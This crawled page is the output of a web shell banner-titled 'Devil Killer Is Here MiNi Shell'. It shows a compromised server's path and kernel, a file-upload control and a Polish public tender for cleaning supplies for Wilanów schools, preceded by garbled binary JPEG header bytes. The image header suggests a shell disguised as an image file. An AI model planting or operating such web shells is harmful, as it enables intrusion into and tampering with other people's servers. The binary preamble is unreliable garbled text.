JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250717/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250717/0033147901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy środków czystości dla placówek oświatowych w Dzielnicy Wilanów m. st. Warszawy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dzielnicowe Biuro Finansów Oświaty - Wilanów m.st. Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015771007</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">F.Klimczaka 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">222 770 860</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@dbfowilanow.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dbfowilanow.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy środków czystości dla placówek oświatowych w Dzielnicy Wilanów m. st. Warszawy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-00bcca7c-8c94-4d5b-9f2e-e94823eafcba</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00331479</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00012798/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 dostawa środków czystości</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-00bcca7c-8c94-4d5b-9f2e-e94823eafcba <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat<br/>zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-<br/>Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki.<br/>5.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku<br/>załączników, które są zgodnie z ustawą lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być<br/>opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, podpisem zewnętrznym<br/>lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>ewelina.dzierzek@grupantt.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych w rozumieniu rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych), (Dz. Urz. UE L 119 z dnia 04.05.2016 str. 1 oraz Dz. Urz. UE L 127 z dnia 23.05.2018, str. 2), dalej zwanego<br/>„RODO”:<br/>1) Wykonawcy będącego osobą fizyczną,<br/>2) Wykonawcy będącego osobą fizyczną prowadzącą jednoosobową działalność gospodarczą,<br/>3) pełnomocnika ustanowionego do reprezentowania Wykonawcy w Postępowaniu, będzie Dzielnicowe Biuro Finansów Oświaty -<br/>Wilanów m.st. Warszawy&#34; w<br/>Warszawie jako Zamawiający. Prawa w zakresie ochrony danych<br/>osobowych można zrealizować</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DBFO-XV/PZP/03/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 – dostawa środków czystości dla Dzielnicowego Biura Finansów Oświaty Dzielnicy Wilanów (DBFO) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39800000-0 - Środki czyszczące i polerujące</p> <p class="mb-0">39820000-6 - Środki organiczne powierzchniowo czynne</p> <p class="mb-0">39832000-3 - Produkty do zmywania naczyń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert oraz ich znaczenie procentowe (dotyczy Części nr 1 – Części nr 2):<br/>Kryteria Waga<br/>1. Cena 60 %<br/>2. Termin dostawy 40 %<br/>2. W Postępowaniu zostanie wybrana oferta, która uzyska najwyższą liczbę punktów w sumarycznej ocenie ofert obliczonej według<br/>wzoru (dotyczy Części nr 1 - Części nr 2):<br/>C = C1 + TD<br/>Gdzie:<br/>C - ostateczna ilość punktów przyznanych badanej ofercie we wszystkich kryteriach,<br/>C1 – ilość punktów przyznanych badanej ofercie w kryterium „Cena”,<br/>TD – ilość punktów przyznanych badanej ofercie w kryterium „Termin dostawy”.<br/>3. Zasady oceny kryterium „Cena” (C1).<br/>Ilość punktów uzyskanych przez ofertę za kryterium „Cena” obliczona zostanie według wzoru:<br/>C1 = Cmin/Cbad * 60 pkt<br/>gdzie:<br/>C1 – liczba punktów przyznana ocenianej ofercie w ramach kryterium „Cena”,<br/>Cmin – najniższa cena brutto zaoferowana w ofertach złożonych na realizację Zamówienia w ramach danej Części,<br/>Cbad – cena całkowita brutto oferty badanej złożonej na realizację Zamówienia w ramach danej Części.<br/>4. Zasady oceny kryterium „Termin dostawy” (TD).<br/>Ocena punktowa oferty w tym kryterium zostanie obliczona według poniższych zasad:<br/>Ilość punktów przyznana ofercie za kryterium termin dostawy:<br/>LP. TERMIN DOSTAWY ZAMÓWIENIA<br/>LICZBA PUNKTÓW:<br/>1. 1 dzień roboczy 40,00 pkt<br/>2. 2 dni robocze 30,00 pkt<br/>3. 3 dni robocze 20,00 pkt<br/>4. 4 dni robocze 10,00 pkt<br/>5. 5 dni roboczych 0,00 pkt<br/>UWAGA:<br/>• W przypadku braku zadeklarowania w ofercie terminu dostawy, Zamawiający przyjmie, że Wykonawca oferuje najdłuższy<br/>dopuszczalny termin 5 dni roboczych i przyzna 0 punktów.<br/>• W przypadku zadeklarowania przez Wykonawcę terminu dłuższego niż 5 dni roboczych, Zamawiający odrzuci ofertę na podstawie<br/>art. 226 ust. 1 pkt 5) Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 – dostawa środków czystości dla Młodzieżowego Domu Kultury nr 8 (MDK), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39800000-0 - Środki czyszczące i polerujące</p> <p class="mb-0">39820000-6 - Środki organiczne powierzchniowo czynne</p> <p class="mb-0">39832000-3 - Produkty do zmywania naczyń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert oraz ich znaczenie procentowe (dotyczy Części nr 1 – Części nr 2):<br/>Kryteria Waga<br/>1. Cena 60 %<br/>2. Termin dostawy 40 %<br/>2. W Postępowaniu zostanie wybrana oferta, która uzyska najwyższą liczbę punktów w sumarycznej ocenie ofert obliczonej według<br/>wzoru (dotyczy Części nr 1 - Części nr 2):<br/>C = C1 + TD<br/>Gdzie:<br/>C - ostateczna ilość punktów przyznanych badanej ofercie we wszystkich kryteriach,<br/>C1 – ilość punktów przyznanych badanej ofercie w kryterium „Cena”,<br/>TD – ilość punktów przyznanych badanej ofercie w kryterium „Termin dostawy”.<br/>3. Zasady oceny kryterium „Cena” (C1).<br/>Ilość punktów uzyskanych przez ofertę za kryterium „Cena” obliczona zostanie według wzoru:<br/>C1 = Cmin/Cbad * 60 pkt<br/>gdzie:<br/>C1 – liczba punktów przyznana ocenianej ofercie w ramach kryterium „Cena”,<br/>Cmin – najniższa cena brutto zaoferowana w ofertach złożonych na realizację Zamówienia w ramach danej Części,<br/>Cbad – cena całkowita brutto oferty badanej złożonej na realizację Zamówienia w ramach danej Części.<br/>4. Zasady oceny kryterium „Termin dostawy” (TD).<br/>Ocena punktowa oferty w tym kryterium zostanie obliczona według poniższych zasad:<br/>Ilość punktów przyznana ofercie za kryterium termin dostawy:<br/>LP. TERMIN DOSTAWY ZAMÓWIENIA<br/>LICZBA PUNKTÓW:<br/>1. 1 dzień roboczy 40,00 pkt<br/>2. 2 dni robocze 30,00 pkt<br/>3. 3 dni robocze 20,00 pkt<br/>4. 4 dni robocze 10,00 pkt<br/>5. 5 dni roboczych 0,00 pkt<br/>UWAGA:<br/>• W przypadku braku zadeklarowania w ofercie terminu dostawy, Zamawiający przyjmie, że Wykonawca oferuje najdłuższy<br/>dopuszczalny termin 5 dni roboczych i przyzna 0 punktów.<br/>• W przypadku zadeklarowania przez Wykonawcę terminu dłuższego niż 5 dni roboczych, Zamawiający odrzuci ofertę na podstawie<br/>art. 226 ust. 1 pkt 5) Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy posiadają określone zdolności zawodowe, tj. zrealizowali w<br/>okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert (a jeśli okres prowadzenia działalności jest krótszy to<br/>w tym okresie) a w przypadku świadczeń ciągłych, realizują co najmniej jedno zamówienie (umowę) o wartości min.<br/>10.000,00 złotych brutto (słownie: dziesięć tysięcy, 00/100), polegającą na dostawie środków czystości (dot. Części nr 1 – nr 2).<br/>Uwaga:<br/>Zamawiający zaznacza, iż w przypadku powoływania się przez Wykonawcę na zamówienie będące w trakcie realizacji, co<br/>najmniej jedno zlecenie realizowane w ramach przedmiotowego zamówienia musi osiągnąć wartość co najmniej 5.000,00<br/>złotych (słownie: pięć tysięcy, 00/100) złotych brutto.<br/>W sytuacji gdy Wykonawca składa ofertę na więcej niż jedną Część Zamówienia wymagana jest wielokrotność wartości<br/>zamówień wskazanych w Załączniku nr 5 do SWZ – Wykaz dostaw (dotyczy Części nr 1 – nr 2) np. jeżeli Wykonawca<br/>składa ofertę na dwie (2) Części, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy posiadają określone<br/>zdolności zawodowe, tj. zrealizowali w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert (a jeśli okres<br/>prowadzenia działalności jest krótszy to w tym okresie) a w przypadku świadczeń ciągłych, realizują co najmniej jedne<br/>zamówienie (umowę) o wartości min. 20.000,00 złotych brutto (słownie: dwadzieścia tysięcy, 00/100), polegającej na<br/>dostawie środków czystości itd.<br/>Uwaga:<br/>W przypadku Wykonawców wspólnie ubiegający się o udzielenie Zamówienia oraz w przypadku polegania na zasobach<br/>podmiotów udostępniających swoje zasoby warunek opisany w ust. 2 powyżej może spełniać łącznie grupa Wykonawców<br/>wspólnie ubiegających się o udzielenie Zamówienia (dotyczy Części nr 1 – nr 2). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą, który złożył odrębną<br/>ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (zgodnie z treścią Załącznika nr<br/>3 do SWZ).<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) Ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2)<br/>powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce 